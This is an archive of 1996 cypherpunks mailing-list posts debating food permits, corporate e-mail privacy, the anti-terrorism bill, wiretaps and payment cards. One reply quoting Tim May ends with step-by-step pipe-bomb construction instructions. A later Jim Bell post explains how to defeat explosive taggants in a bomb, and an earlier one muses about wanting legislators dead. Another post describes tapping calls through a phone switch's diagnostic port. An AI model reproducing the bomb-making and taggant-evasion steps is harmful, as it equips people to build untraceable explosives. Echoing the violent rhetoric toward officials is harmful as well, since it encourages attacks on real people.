Subject: Re: A Libertine Question
In-Reply-To: <Pine.SV4.3.91.960802005945.11780D-100000@larry.infi.net>
Message-ID: <Pine.LNX.3.93.960802164703.1649B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Aug 1996, Alan Horowitz wrote:
> We require property owners who don't have city-sewage hookups, to install 
> their septic tanks and maintain them in certain defined configurations 
> which estop them from contaminating the neighbor's well. I don't know if 
> that's a good idea or not - but I haven't seen sentiment against sewage 
> regulation of property owners.
> So why should we be terribly upset about an ordinance which makes it 
> illegal to operate a residential kitchen and a residential sewge-disposal 
> operation in a city park or a city sidewalk?

     As long as you are enforcing it on everyone, I don't think you'd have a 
problem, but to force some one from cooking food for homeless people, and 
allow a family barbeque, is IMO wrong. If it is unsafe/unsanitary to cook 
food in a certain way, it is unsafe/unsanitary. Selective enforcement is 
wrong. 

     Force the yuppies on a sunday afternoon barbeque to get a permit and 
see how long the law lasts.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Sat, 3 Aug 1996 10:33:00 +0800
To: cypherpunks@toad.com
Subject: ITAR
Message-ID: <9608022350.AA01262@supernova.netapp.com>
MIME-Version: 1.0
Content-Type: text/plain



How about exporting programs, that when executed generate source code for
encryption algorithms?

(xmas.c comes to mind, an obscurity winning c program that writes out the
 twelve days of Christmas.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Sat, 3 Aug 1996 08:53:52 +0800
To: gkuzmo@ix.netcom.com (George Kuzmowycz)
Subject: Re: Corporate e-mail policy
Message-ID: <199608022151.QAA02114@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


George Kuzmowycz wrote:

:   The company I work for has set up a committee to draft a security 
: policy involving, among other things, e-mail. Since I'm responsible 
: for our networking and e-mail, I'm part of this group. Unfortunately, 
: I'm outnumbered by legal, auditing and HR types who, basically, want 
: to have access to everything.

First, figure out what *your* objective is. You can't achieve e-mail
privacy by implementing some idealized policy that says "Our company
won't snoop into e-mail."  It is the obligation of corporate
functionaries to act in the corporation's best interest, and if that
includes violating the privacy policy (as opposed to civil or criminal
statutes) then it's going to happen. If you write it into one policy,
they'll just find a different one that they can apply to override it.

As you pointed out, the courts agree with this interpretation.  Let us
focus on what we *can* fix.

You can make things better if you write the policy to reduce the risk
of abuse. Nip this nonsense about "access to everything" in the bud.
For example, the policy could provide oversight by requiring approvals
from affected people (the victim's manager if not the actual victim).
Then, access is granted to the victim's files and not to all the
files. Even if auditors want to do "random audit" of e-mail, they
don't really need "access to everything" to achieve it.  They can
randomly select messages somehow and only get readable copies after
the messages are selected.

You'd probably find lots of support for a more measured policy like
this. For example, mail from the CEO or the head of the Audit
department shouldn't be an open book just because Joe Blow from Audit
is "auditing e-mail today."

Also, your policymakers might think about the issues raised by the
recent skit, "FBI Files on Republicans Stored in the Democratic White
House." If they demand unlimited access to e-mail files, they might be
held responsible for making use of information contained therein
simply because they *could* have read them.

Rick.
smith@sctc.com         secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 3 Aug 1996 09:37:50 +0800
To: David Wagner <daw@cs.berkeley.edu>
Subject: Re: [off-topic] roving wiretaps
In-Reply-To: <4tsfjm$oi6@joseph.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.93.960802165418.1649C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On 2 Aug 1996, David Wagner wrote:
> In article <01I7RM0CJM388Y4XIK@mbcl.rutgers.edu>,
> I don't get it.  Help me out here-- how can this possibly be constitutional?

     It isn't, since when has that stopped them?

> I'm reading the Fourth Amendment to our honored Constitution of the United
> States, which proclaims
> Are we just to strike out that emphasized phrase?  What's going on here?
> Someone tell me I'm not just having a bad nightmare.

     You're not having a nightmare, it's reality. 

> Apologies if these are silly questions,

     It isn't the questions that are stupid, it is answers.              

> P.S.  Do police really need a search warrant to wiretap cellular phones?

     No, not to tap the phone, just to use it as evidence.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sat, 3 Aug 1996 11:00:46 +0800
To: cypherpunks@toad.com
Subject: AP story: Police look for Olympic bombing Internet link.
Message-ID: <v03007803ae2846cb0c98@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


Search Campus Where Jewell Worked;
 Check Internet Link

By Associated Press, 08/02/96

ATLANTA (AP) - Widening their investigation of Richard Jewell,
federal and state agents descended on a small Georgia college campus
Friday to hunt for evidence linking him to the Olympic park bombing.

Among other things, investigators were trying to determine whether the
former campus guard had tapped into the Internet via Piedmont College
computers, a campus source reported. Bomb-making instructions
available through the global computer network have contributed to an
increase in bombings in the United States, authorities say.

[From http://www.boston.com/globe/cgi-bin/globe.cgi?ap/apnat.htm ]

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 3 Aug 1996 09:54:40 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Bombs & bomb threats in LA
In-Reply-To: <ae27a13f03021004323f@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960802170604.7666C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Didn't (left-radical) Abbie Hoffman's anarchy bible _Steal This Book_ have 
some bombmaking instructions also?  I don't recall civilization falling in 
1968 or thereabouts when STB was published.

bd

On Fri, 2 Aug 1996, Timothy C. May wrote:

> At 9:33 AM 8/2/96, Conrad Walton wrote:
> 
> >i'm not exactly sure what an acid bomb is, but according to my book, The
> >Anarchist Cookbook, that I bought in 1972 (was the internet around back
> >then?), there is a compound called "picric acid" that is "more powerful
> >than TNT, but has some disadvantages".
> 
> The ARPANET (or ARPANet, or Arpanet...) was around then. (I had an account
> on it, circa 1973...not very useful for me.)
> 
> I also got my copy of "The Anarchist Cookbook" back around then. It was in
> the news locally when the Santa Barbara County Sheriff's office attempted
> to have it removed from the local bookstores....this removed it all right,
> as the stacks of copies sold out as quickly as they could be received and
> unpacked.
> 
> (As others have noted over the years, much of the advice is probably bogus
> and even dangerous. Not being an explosives dabbler, I wouldn't know.)
> 
> If Feinswine gets her ban on bomb-making information passed, and this is
> upheld by the courts (doubtful), the sites will be swamped with information
> queries, and fooling around with bombs will become more popular amongst the
> teenage set that has not expressed much interest in such things the past
> couple of decades.
> 
> The more things change, the more they remain the same.
> 
> --Tim May, an I-bomb-throwing crypto anarchist
> 
> Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
> ends.  Buy two metal caps to fit.  These are standard items in hardware
> stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
> good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
> on one end. Fill the pipe to within 1/2 inch of the top with black powder.
> Do not pack
> the powder. Don't even tap the bottom of the pipe to make it settle.  You want
> the powder loose.  For maximum explosive effect, you need dry, fine powder
> sitting loose in a very rigid container.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 3 Aug 1996 10:55:39 +0800
To: cypherpunks@toad.com
Subject: Re: URGENT: Surveillance Bill Gets New Life - House Vote lLikely TODAY!
Message-ID: <199608030013.RAA03026@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:21 PM 8/2/96 -0700, Timothy C. May wrote:

>("I had no idea of what was in the Communications Decency Act...it just
>sounded like the "decent" thing to vote for."....."You mean the
>Anti-Terrorism Bill suspends habeus corpus? What's that? I'll ask my
>staffers to look into it.")
>
>Fuck 'em all. Fawkes had it wrong...they're not worth the powder to blow
>'em to hell.
>
>All we can do is work on technological workarounds. Making their $2 billion
>Wiretap Boondoggle a worthless exercise is a start.

I thought of what I consider to be an excellent "workaround."   The way I 
see it, a majority of us want to see a majority of them dead, or at least 
resigned.  If that's the case, why can't we get what we want?



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@charley.clark.net>
Date: Sat, 3 Aug 1996 08:50:30 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199608022200.SAA02309@charley.clark.net>
MIME-Version: 1.0
Content-Type: text/plain


reply to: sparks@bah.com
Subject: an endorsement ( sort of )
In-Reply-To: <Pine.SUN.3.91.960802100643.24257A-100000@psyche.the-wire.com>
X-Mailer: Ishmail-demo 1.2.2-960711-linux <http://www.ishmail.com>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

I just downloaded a copy of Ishmail ( http://www.ishmail.com) and I'm
really impressed. I have a few things to tweek ( I installed it in the
wrong directory so I have to be root for the moment ) but the interface
to PGP is transparent.. smooth as a baby's a** !! I had a couple of
questions, and they were answered very quickly.  I found something I
really like !! well worth the price for the UNIX / LINUX weenies (IMHO)

Charley Sparks


  Charles E. Sparks <sparks@bah.com>
In God We Trust, All Others we Encrypt
Public Key at:
http://www.clark.net/pub/charley/pc_1.htm
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCXAwUBMgJ6ZOJ+JZd/Y4yVAQFWXgQMD5LMIBHPa0lKJAT0zPXA4ykYSNTf5a0o
rpnoDFLlby5m+VdyJWLAwaQ1o3JiFP6q20u/lVh+Ixsgg2Yf27GGzur36jYjxNv8
Ist7uiDug3UHdmDZy6SYG6TM1MG6MARaixCE4HfV0DCZYt9ZAIWYAQWgRAOh7+fp
3QLUKATFJyeGTg==
=+Pyo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Sat, 3 Aug 1996 04:12:20 +0800
To: "'Bruce Schneier'" <schneier@counterpane.com>
Subject: Tao Renji Public Key system
Message-ID: <01BB80A1.2447DD00@JPKroepsli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


Dear Bruce,
I was testing the Raike's Public Key software, when I remembered a section of your excellent book.
In Applied Cryptography, second edition, section 19.10 (page 482) you present the Renji's work about a public key algorithme based on finite automata.
Where could we found the FAPKC1 and FAPKC2 algorithms, their implementations, and executable versions (you mention an Intel486 test).
Many thanks,
With kindest regards
Jean-Paul
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet Communication and Commerce, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 3 Aug 1996 08:58:25 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: "And who shall guard the guardians?"
In-Reply-To: <199608021800.LAA10727@toad.com>
Message-ID: <199608022215.SAA04249@nrk.com>
MIME-Version: 1.0
Content-Type: text


> The English-Only bill just passed in the House bans the use of
> non-English languages by government officials.  Does Tim's sudden 
> avoidance of the Latin mean that _he_'s the Fed??  

What about Navajo?


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 3 Aug 1996 09:04:30 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: "And who shall guard the guardians?"
In-Reply-To: <199608021800.LAA10727@toad.com>
Message-ID: <199608022211.SAA04204@nrk.com>
MIME-Version: 1.0
Content-Type: text


> The English-Only bill just passed in the House bans the use of
> non-English languages by government officials.  Does Tim's sudden 
> avoidance of the Latin mean that _he_'s the Fed??  

What about Navajo?


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Aug 1996 13:13:00 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <ae27f97600021004ec6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 AM 8/3/96, Declan McCullagh wrote:
>Stop the presses -- the other shoe didn't drop. Despite a flurry of
>last-minute hyperbole, the House passed an anti-terrorism bill this
>afternoon without the ominous encryption or wiretap provisions. Now
>the bill lies in the lap of the Senate, which probably will approve it
>later today or tomorrow before they leave town for the August recess.

I agree. And I think we should thank CDT, EFF, the ACLU, and (gasp) the NRA
for ensuring that martial law provisions did not get slipped in during the
rush to get out of Washington for the recess. (And maybe other groups...I
don't follow all the politics.)

I'm watching Rep. Bob Barr (R) on "Larry King Live," on CNN. He makes a lot
of sense, and keeps coming back to civil liberties, the alliance between
the ACLU and the NRA on this one, etc. His adversary, Rep. John Conyers (D)
is calling for stronger measures, for the need to "do something."

(I thought the Democrats nominally stood for certain types of civil
liberties? Not that I ever was fooled by them, but this is the public
personna they present.)


>The Net owes its thanks to the House Republicans for stopping these
>fool Dems in a fine backroom political maneuver late last night.

By the way, my blasting of Sen. Dianne Feinstein as "Fineswine,"
"Swinestein," etc. (names not original with me, of course) is heartfelt. I
don't mine dealing with opponents, even articulate enemies of freedom. But
Feinstein is a halfwit and a hypocrite. A San Francisco society lady
masquerading as a senator. She's proof that transmigration of souls is
real, being the incarnation of Marie Antoinette. "Let them eat cake."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 3 Aug 1996 10:29:41 +0800
To: gkuzmo@ix.netcom.com (George Kuzmowycz)
Subject: Re: Corporate e-mail policy
In-Reply-To: <199608021611.JAA13044@dfw-ix10.ix.netcom.com>
Message-ID: <199608022351.SAA14955@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


George Kuzmowycz wrote:
>   In an ideal world, the rest of the group would agree with me and say
> "Yup, we have no business reading e-mail." Since that's not likely,
> I'm looking for examples of "privacy-friendly" corporate policies
> that I can put on the table in our meetings, and end up with a
> minority report.  
> 

Maybe it is only me, but I recommend "privacy-fascist" policy. This way
employees will at least know to keep their own business out of computers
that will be monitored by the company anyways.

This is ultimately to the betterment of employees themselves if they
fall prey to complaints of the likes of January KOTM The Right Reverend
Colin James III (puke). For the information of those who do not know
CJ3 made it a hobby to complain to the employers of people whom he did
not like -- with not much success though.

The employees would easily be able to say that the employer has nothing
to do with the alleged matters of complaints.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Aug 1996 12:30:03 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <199608030142.UAA11326@einstein>
Message-ID: <Pine.SUN.3.91.960802185527.26652A-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 2 Aug 1996, Jim Choate asked:

> A reasonable person recognizes that such a business has two ways
> of fulfilling its responsiblities. They can either submit to
> regulation and quality control from the local municipality or
> else they can hang signs about their place of business declaring
> "Caveat Emptor: Our food may be tainted, eat at your own risk".
> Which do you think is the more reasonable?

It would be nice if businesses were offered that choice.  I would
choose the second, myself.  Only my sign would say, "Our food is
guaranteed not tainted by the Acme insurance company, not some
corrupt government."  The problem is, governments do not allow 
businesses nor consumers to make that sort of choice.  With them 
it's, "my way or the highway" (or harassment and jail actually).

> People and businesses are not the same.

Until Jim shows me a business that isn't owned and operated by
people, I'll have to respectfully disagree.  Businesses are just
people acting alone or in concert.  Actions are what count, not
whether the action is of a pecuniary nature or not.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Aug 1996 14:10:34 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: VISA Travel Money
In-Reply-To: <3202AC0F.41C6@ai.mit.edu>
Message-ID: <Pine.SUN.3.91.960802191032.26652B-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 2 Aug 1996, Hallam-Baker wrote:

> They [VISA Travel Money cards] are usefull for the one purpose
> for which they are designed. One can go off to a foreign
> country and obtain cash...

Agreed, but does anyone have any reason to believe that these
cards cannot now (or perhaps will) be used just like regular
VISA cards for purchases in stores, restaurants, etc.?

I have two VISA debit cards in my name which can be used anywhere
VISA credit cards are accepted.  The VISA Travel Money card 
appears to be nothing more than a debit card that is tied to a
special sub-account at the issuing bank rather that the account
of a named individual.  At least where the retail establishment
has an on-line credit card terminal, the risks and protections
should be equivalent to a regular debit card. 

I'd bet dollars to donuts that the VISA Travel Money cards will
be usable just like VISA credit and debit cards within the next
2-3 years.  My guess is that they are just going slow to see
what sort of reception the Money cards get.


 S a n d y

P.S.	Phil should realize that my offer to bet dollars
	against donuts was not a serious wager.  It will
	not be necessary, therefore, for him to come up
	with some elaborate rationale to weasle out of
	the bet.  :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 10:29:53 +0800
To: cypherpunks@toad.com
Subject: Re: [off-topic] roving wiretaps (fwd)
Message-ID: <199608030027.TAA11243@einstein>
MIME-Version: 1.0
Content-Type: text



Hi,

Forwarded message:

> Date: Fri, 02 Aug 1996 16:41:17 -0700
> From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
> Subject: Re: [off-topic] roving wiretaps

> A sophisticated land line wiretap that will not be detectable by the 
> average citizen will cost well over $500, plus you have to install it 
> without the target knowing, etc.  

It costs nothing, it is already built into the switch at part of the
standard diagnostics. I spent 5 years at the University of Texas at Austin
working in security and part of my job was support of the NT switch. You
go to the switch put a butt-set or recorder on the diag port and route
the call data over to that port.


                                                  Jim Choate







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jseiger@cdt.org (Jonah Seiger)
Date: Sat, 3 Aug 1996 10:30:08 +0800
To: cypherpunks@toad.com
Subject: Latest info on the "counter-terrorism" bill
Message-ID: <v01520d01ae27fabe505a@[204.157.127.21]>
MIME-Version: 1.0
Content-Type: text/plain



The House passed a revised counter-terrorism bill this afternoon by a
substantial majority.  The bill is expected to be considered by the Senate
on Saturday 8/3, and is likely to pass.

The House-passed bill DOES NOT contain ANY of the privacy threatening
provisions.  Provisions dealing with funding for the Communications
Assistance for Law Enforcement Act (Digital Telephony) were REMOVED from
the bill just before the vote after civil liberties groups AND the FBI
objected to the language. Provisions dealing with emergency wiretap
authority and "roving wiretaps" were also not included in the House-passed
bill.

In addition, the bill does not contain any encryption provisions. Earlier
in the week, the Administration had circulated an outline of their
anti-terrorism proposal which included new, unspecified restrictions on
encryption.  Senators Burns (R-MT), Leahy (D-VT), Pressler (R-SD), Lott
(R-MS), and others worked hard to prevent any encryption provisions from
being included in early versions of the bill, and deserve a lot of credit
for fighting for the Net. It's nice to finally have a number of powerful
allies joining the usual defenders of net.freedom on Capitol Hill.

The bill passed today contains provisions increasing airport security,
studies on ways to improve US anti terrorism policy and other terrorism
issues, and a controvertial provisions expanding federal racketeering laws
to cover terrorist activity.

The bill also contains a small but not insigificant privacy victory. The
bill doubles the punishment from 5 to 10 years for unlawful disclosure of
information obtained from a warrant and increases certain penalties for
violation of the Privacy Act.

This is not over yet -- many of these issues, particularly encryption and
Digital Telephony funding, are likely to be back before the Congress in
September, so stay tunned...

Thanks to everyone who called Congress today to object to the new sweeping
surveillance provisions that were dropped from the bill! It looks like we
mave had really made a difference in this debate.

More as it comes...

Jonah

--
Jonah Seiger, Policy Analyst               Center for Democracy and Technology
<jseiger@cdt.org>                          (v) +1.202.637.9800

http://www.cdt.org/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Sat, 3 Aug 1996 10:32:00 +0800
To: cypherpunks@toad.com
Subject: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <v01510107ae28511736d5@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Stop the presses -- the other shoe didn't drop. Despite a flurry of
last-minute hyperbole, the House passed an anti-terrorism bill this
afternoon without the ominous encryption or wiretap provisions. Now
the bill lies in the lap of the Senate, which probably will approve it
later today or tomorrow before they leave town for the August recess.

In the wake of the dual bombings, Congress wanted to be seen as taking
*some* action before they adjourned, and last weekend Clinton and the
Dems started lobbying hard for the heinous measures they wanted in an
anti-terrorism bill. Vastly expanded state-snooping capabilities:
multipoint wiretaps, warrantless short-term wiretaps, dialed-phone
number recorders, and black and smokeless powder taggants. Even
possible of anti-crypto language that Jamie Gorelick, deputy attorney
general, has been shopping around for months.

The Net owes its thanks to the House Republicans for stopping these
fool Dems in a fine backroom political maneuver late last night.

They did it through the House Rules Committee, which in the wee hours
of the morning reported a rule allowing the GOP leadership to introduce
the terrorism bill on the floor today -- without letting Democrats see
it, amend it, or even send it back to committee. It was a good plan --
coordinated by Rep. Chris Cox -- keeping the legislation away from the
hands of the Big Brother Dems.

The Democrats waxed pissy. Rep. David Bonior, the party's whip, called
the majority's maneuvering "extrordinary." John Conyers, the ranking
Democrat on the House Judiciary Committee, blasted Gingrich and the
Republican leadership for "bringing a meaningless bill to the House
floor."

Conyers said to reporters at 1 pm: "It's a hoax on the American
people. It is all bark and no bite... This bill is missing the
important wiretapping provisions that would allow law enforcement to
find and stop terrorists before they kill. The House Republicans and
the NRA say we should not have emergency authority for surveillance
even if we know terrorists are about to blow a plane out of the sky.
They also say that we should not have wiretap authority for terrorists who
use more than one telephone to make their deadly plans."

Of course, this is political grandstanding at its finest -- or worst.
Conyers conveniently neglected to add that law enforcement officers
already have the right to use roving wiretaps with court approval.

Also, there was a mixup over Digital Telephony funding, compounded by
the text of the legislation's being kept secret until the last minute.
Summaries distributed to reporters early this afternoon said: "The bill
authorizes the FBI to use enhanced telephone technology to investigate
suspected terrorist activity. Funding for equipment purchase was
provided in the 1996 omnibus appropriations measure enacted earlier
this year." But the DT provisions weren't in the final draft of the bill.

Silly Congressperns. The House had *already* approved the DT slushfund
on July 24 as part of the 1997 Commerce, Justice, State departments
appropriations bill.

Now the 1997 CJS appropriations bill goes to the Senate, which will
decide how much cash to give Digital Telephony when they return in early
September.

What's going to happen? Well, Sen. Patrick Leahy (D-Vermont), a former
prosecutor and longtime proponent of Digital Telephony, said yesterday
at the Intelligence Committee hearing on terrorism: "I was proud to
have worked with the FBI director to ensure passage of the
Communications Assisatance for Law Enforcement Act, sometimes called
the digital telephony law."

With Republicans like the ones in the House, who needs so-called "civil
libertarian" Democrats?

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Aug 1996 13:17:39 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS (fwd)
Message-ID: <ae28119a020210049840@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:10 AM 8/3/96, Jim Choate wrote:

>True enough, but not the whole story. If a dog or cat is kept well and fed
>good quality food they live 10+ years. The average life of an animal on the
>street is between 2-5 years. As to people, we now live around 75-80 years,
>prior to all these rules and regulations on food and such the average was
>20-25. If we go back to what you propose you would be dead a long time ago.

Hardly a proved correlation. A lot of other factors come into play. But
never mind. No point arguing.

...
>I personaly find it reassuring that some bunch of knuckle-heads are unable
>to start a chip making facility like you support. The thought of finding
>flourine compounds in the local river (where I get my tap water) or simply
>dumped in the air is a little unsettling. Just because some group of bozo's
>want to start a business is not sufficient justification for that to be
>allowed.

A straw man. There is is no evidence that these startup companies are
dumping stuff in rivers. Jeesh. The point is that large companies learn how
to keep large staffs employed filling out paperwork, and they actually have
come to see it is a good way to keep small companies from forming.


>It seems to me that many of the folks who recognize downsized workers pleas
>for their 'right to a job' as so much bunk are at the same time supporting a
>businesses right to start up. A pretty humorous double standard.

Not at all comparable.


>I have never heard of anyone being arrested for giving away food, only
>selling it without a license. I bet the Salvation Army soup kitchen would be
>worried if this claim were true (they aren't and it ain't).

Then you weren't reading the thread, which in several posts described this
very situation. "Food Not Bombs" was giving away soup, chile, and other
such stuff at a park in Santa Cruz (and maybe elsewhere, e.g., San
Francisco). They were busted.

Now do you understand the situation?


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 3 Aug 1996 11:33:00 +0800
To: cypherpunks@toad.com
Subject: Re: AP story: Police look for Olympic bombing Internet link.
In-Reply-To: <v03007803ae2846cb0c98@[17.202.12.102]>
Message-ID: <9608030114.AA03672@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Search Campus Where Jewell Worked;
 Check Internet Link

By Associated Press, 08/02/96

ATLANTA (AP) - Widening their investigation of Richard Jewell,
federal and state agents descended on a small Georgia college campus
Friday to hunt for evidence linking him to the Olympic park bombing.

Among other things, investigators were trying to determine whether the
former campus guard had tapped into the Piedmont College library, a
campus source reported. Bomb-making instructions available through the
national inter-library borrowing network have contributed to an increase
in bombings in the United States, authorities say.

[Not From <http://www.boston.com/globe/cgi-bin/globe.cgi?ap/apnat.htm ]



andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 3 Aug 1996 14:35:57 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <199608030328.UAA11944@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:48 PM 8/2/96 -0500, Declan McCullagh wrote:
> and black and smokeless powder taggants.

Such materials will be easy to defeat.  Find an indoor shooting range, 
vacuum up the powder residue that falls  in front of the shooting stalls, 
and you'll have a concentrated mixture of literally hundreds of types of 
taggants.  Add to bomb.  Laughing, at this point, is optional.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 3 Aug 1996 13:28:38 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <v02120d08ae2866db0ddc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:50 8/2/96, Paul J. Bell wrote:
>i, for one, and perhaps others on the list as well, would be interested in
>hearing
>what you mean when you say, "At&t, Microsoft, etc) who are ripping people
>off on a
>daily basis".
>
>for example, in what way is AT&T ripping people off? and what about
>microsoft?

Its up to you what you call it, but here is an interesting example:

An international phone call costs about 2 cents/min to produce. The average
rate paid for by the consumer is 62 cents. That's means the carriers mark
up this particular product by an amazing 3000%.

Can you name another business that has comparable mark-ups?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 3 Aug 1996 13:27:33 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: More evidence that democracy is bunk
